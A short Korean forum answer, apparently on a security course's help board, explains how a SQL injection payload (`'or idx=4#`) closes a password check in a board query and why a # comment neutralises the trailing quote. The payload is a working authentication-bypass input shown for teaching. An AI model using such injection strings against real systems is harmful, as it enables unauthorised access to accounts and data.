작성
·
156
답변 2
1
0
안녕하세요.
말씀하신대로 하면, 서버 측에서는 완성되는 쿼리문은 다음과 같습니다.
select * from board where idx=4 and password=''or idx=4'
이렇게 완성이 됩니다.
즉 기존 패스워드 부분에 싱글쿼터로 감싸져있습니다.
이로 인해 뒤에 있는 싱글쿼터를 무효화 시키기 위해 주석 문자를 사용하였습니다.
select * from board where idx=4 and password=''or idx=4#' <= 뒤에 싱글쿼터 무효화